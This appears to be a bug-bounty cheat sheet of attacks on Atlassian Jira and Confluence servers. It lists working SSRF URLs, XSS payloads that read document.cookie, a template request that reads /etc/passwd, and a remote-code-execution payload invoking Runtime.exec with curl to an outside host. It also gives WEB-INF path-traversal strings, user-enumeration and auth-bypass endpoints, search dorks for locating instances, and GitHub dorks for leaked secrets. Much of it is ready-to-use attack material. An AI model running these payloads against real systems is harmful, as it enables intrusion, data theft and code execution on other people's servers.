https://blog.csdn.net/caiqiiqi/article/details/89017806
/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl
https://ecosystem.atlassian.net/browse/OAUTH-344 To exploit an SSRF vulnerability in confluence and I was able to perform several actions such as bypass any firewall/protection solutions, was able to perform XSPA through assessing the response times for ports, access Internal DoD Servers and internal services.
I discuss the vulnerabilities exploited in my write which you can find here, https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a
https://host/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json
https://hackerone.com/reports/380354 https://jira.atlassian.com/browse/JRASERVER-67289 HOW TO EXPLOIT: https://host/issues/?filter=-8 Go to the link above Click the "Updated Range:" text area Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (No length limit, ONLY put the payload in the first box) Click Update Payload will run. If it doesn't run chances are you used double quotes somewhere. Only use single quotes!
POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: JIRA ...
{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler(.)com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search ConfigurePortalPages.jspa
Information disclosured vulnerability 1.()https://jira.atlassian.com/browse/JRASERVER-69242 visit the URL address,you can check the user whether is exist on this host /rest/api/2/user/picker?query=admin
So the attacker can enumerate all existing users on this jira server.
https://jira.atlassian.com/browse/JRASERVER-69241 visit the URL address,the server will leaking some server's information
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
Summary:
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
Vulnerable endpoint:
https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true by manipulating query= you can enumerate groups/users
Impact:
Information disclosure
Links:
https://github.com/mufeedvh/CVE-2019-8449
https://jira.atlassian.com/browse/JRASERVER-69796
https://nvd.nist.gov/vuln/detail/CVE-2019-8449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8449
https://www.cvedetails.com/cve/CVE-2019-8449/
The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
https://jira.atlassian.com/browse/JRASERVER-69793?jql=labels%20%3D%20
PoC:
A request sent to http://vulnerablehost.com/plugins/servlet/gadgets/makeRequest?url=http://vulnerablehost.com@http://targethost.com will be redirected to targethost.com.
References:
http://
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://xyz.burp(.)net').waitFor()
https://hackerone.com/reports/706841
/secure/ContactAdministrators!default.jspa
http://
Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. https://jira.atlassian.com/browse/JRASERVER-71536 POC: https://victomhost/secure/QueryComponent!Default.jspa
Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.
Ref=https://jira.atlassian.com/browse/JRASERVER-71560?jql=text%20~%20%22cve-2020-14181%22 POC: https://victomhost/secure/ViewUserHover.jspa
https://victomhost/ViewUserHover.jspa?username=Admin
/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
Vulnerable to Server Side Request Forgery (SSRF).
This allowed a XSS and or a SSRF attack to be performed. More information about the Atlassian OAuth plugin issue see https://ecosystem.atlassian.net/browse/OAUTH-344 . When running in an environment like Amazon EC2, this flaw can used to access to a metadata resource that provides access credentials and other potentially confidential information.
if its not running redirecting to login panel then run it with curl
Affected software: Atlassian Jira Data Center, Jira Server (also tested on Jira Project Management Software) Affected Vesrion: Before version 8.13.5, and from version 8.14.0 before version 8.15.1 CVEID: CVE-2020-36287 CVSS Score: 5.3 (Medium) CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Fully Patched Version: 8.13.5, 8.15.1, 8.16.0
Link: https://site.com/secure/Dashboard.jspa
POC: https://site.com/rest/dashboards/1.0/10000/gadget/{ID}/prefs
POC: https://github.com/f4rber/CVE-2020-36287
https://www.rapid7.com/db/vulnerabilities/atlassian-jira-cve-2020-36287/
https://jira.atlassian.com/browse/JRASERVER-72258 [Anonymously accessible Dashboards can leak private information via configured gadgets CVE-2020-36287]
Vulnerable:
Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1
Summary:
The remote web server hosts a web application that is affected by an information disclosure vulnerability.
Affected endpoint:
https://example.com/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
Description:
The instance of Atlassian Jira hosted on the remote web server is affected by an information disclosure vulnerability in QueryComponentRendererValue!Default.jspa due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a specially crafted HTTP request, to disclose sensitive information which may aid in further attacks.
Solution:
Upgrade to Atlassian Jira version 8.5.15 / 8.13.1 / 8.17.0 or later.
References:
https://jira.atlassian.com/browse/JRASERVER-71559
http://www.nessus.org/u?b658a05a
Description:
CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability in the Atlassian Confluence Webwork implementation. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to vulnerable endpoints on the Confluence Server or Data Center instance. Successful exploitation would allow an attacker to execute arbitrary code.
Vulnerable:
According to Atlassian’s official description, the company has released updates for versions 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0. That leaves CVE-2021-26084 exploitable on Confluence Server versions preceding 6.13.23, from 6.14.0 to 7.4.11, from 7.5.0 to 7.11.6, and from 7.12.0 to 7.12.5. This vulnerability does not affect Confluence Cloud users.
Exploit:
https://github.com/march0s1as/CVE-2021-26084
References:
PoC:
/_/;/WEB-INF/web.xml
/_/;/WEB-INF/decorators.xml
/_/;/WEB-INF/classes/seraph-config.xml
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
/_/%3B/WEB-INF/web.xml
/_/%3B/WEB-INF/decorators.xml
/_/%3B/WEB-INF/classes/seraph-config.xml
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
References:
https://github.com/ColdFusionX/CVE-2021-26086
https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/jira_cve_2021-26086.txt
https://github.com/assetnote/jira-mobile-ssrf-exploit
Description:
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
Vulnerable endpoint: /secure/WBSGanttManageScheduleJobAction.jspa;
https://github.com/Pear1y/CVE-2022-0540-RCE
https://bugalert.org/content/notices/2022-04-20-jira.html
https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
https://nvd.nist.gov/vuln/detail/CVE-2022-0540
https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
https://host/secure/popups/UserPickerBrowser.jspa
https://victomhost/rest/api/2/dashboard?maxResults=100
jira-unauth-popular-filters https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular
https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular https://hackerone.com/reports/197726 https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=popular https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=search
https://hackerone.com/reports/139970
https://host/secure/ConfigurePortalPages!default.jspa?view=popular https://host/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm
https://
https://
https://host/secure/popups/UserPickerBrowser.jspa
Inside a Jira instance any user (even non-authenticated) can check its privileges in /rest/api/2/mypermissions or /rest/api/3/mypermissions . These endpoints will return your current privileges. If a non-authenticated user have any privilege, this is a vulnerability (bounty?). If an authenticated user have any unexpected privilege, this a a vuln.
curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
Affected endpoint:
https://example.com/secure/popups/UserPickerBrowser.jspa
Description:
By default, it’s only accessible to authenticated users. This function is used to search for a user and assign them tasks. It is a complete list of every user’s username and email address. There are three standard user groups in Jira: Administrators, Jira Users, and Anyone. For one reason or another, an administrator may grant the ‘Anyone’ group access to this functionality. This grants anyone access to the function – even anonymous users.
Authorization:
There are a couple of settings in Jira that, when not configured properly, may disclose information about the application and its users. This information may aid an attacker in gaining access to the application. This information disclosure is the result of an authorization misconfiguration in Jira’s Global Permissions settings. Jira uses role-based authorization where users are assigned to groups, and groups are assigned to one or more of the global permissions below.
Jira System Administrators Jira Administrators Browse Users Create Shared Objects Manage Group Filter Subscriptions Bulk Changes
Configuration of global permissions is completely up to the application administrator. If they want to give Bob in accounting Jira System Administrators access, they can certainly do that. There are other less obvious configuration mistakes the results of which may be catastrophic.
Browse Users:
Upon discovering an instance of Jira, one of the first things I like to do is check for anonymous access to the user picker functionality located at /secure/popups/UserPickerBrowser.jspa
Fix:
1.Log in as a user with administrative privileges 2.Click on the options menu at the top right of the window 3.In the drop-down menu, Click System 4.On the left-hand side under Security click the Global permissions link 5.In the center screen under Jira Permissions the Browse Users permission should not contain the Anyone user group
Impact:
This information would be extremely useful in a more targeted password guessing or phishing campaign. If you can compromise an administrator account, all other users are effectively compromised. It’s best to assume that, no matter the security controls in place, at some point an attacker is going to find a way in. Therefore, storing sensitive information such as usernames, passwords is not recommended.
References:
https://medium.flatstack.com/misconfig-in-jira-for-accessing-internal-information-of-any-company-2f54827a1cc5 https://confluence.atlassian.com/adminjiraserver073/managing-global-permissions-861253290.html
Tools:
To automate retrival of emails/usernames, use https://github.com/NetSPI/JIG
https://github.com/netspooky/jLoot
https://github.com/0x48piraj/Jiraffe
https://github.com/bcoles/jira_scan
https://github.com/MayankPandey01/Jira-Lens
[Jira-Lens is a Python Based vulnerability Scanner for JIRA. Jira is a proprietary issue tracking product developed by Atlassian that allows bug tracking and agile project management. This tool Performs 25+ Checks including CVE's and Multiple Disclosures on the Provided JIRA Instance.]
inurl:/plugins/servlet/wallboard/
(This will give all the Jira dashboard which might be vulnerable to XSS.) (Sensitive Data Exposure)
https://www.exploit-db.com/ghdb/6528
This is testing for confluence(Older version) Found CVE:-2018-20824
Created dork: inurl:"/plugins/servlet/Wallboard/"
EP:/?dashboardId=10102&dashboardId=10103&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=fadeZoom&random=false
https://twitter.com/hackersden_/status/1417573513859244032
Useful Jira dorks:
inurl:"dashboard.jspa"
inurl:xyz intitle:JIRA login
site:*/JIRA/login
intitle:"Log In JIRA" inurl:"8080:/login.jsp"
intext:"Welcome to JIRA" "Powered by a free Atlassian Jira community"
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
intext:"Confluence" ext:jsp intitle:"Jira"
inurl:http://confluence. login.action
inurl:https://wiki. .com/confluence/
allinurl: /confluence/login.action?
intitle:dashboard-confluence
inurl:/ContactAdministrators!default.jspa
inurl:/secure/attachment/ filetype:log OR filetype:txt
Github recon Via github dorks to find secret:-
"site[dot]com" send_keys
"site[dot]com" client_secret
"site[dot]com" jira/root password
https://github.com/sushantdhopat/JIRA_testing
https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/jira
https://github.com/NetSPI/JIG - https://medium.flatstack.com/misconfig-in-jira-for-accessing-internal-information-of-any-company-2f54827a1cc5
https://pentestbook.six2dez.com/enumeration/webservices/jira
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md (Jira Common Bugs)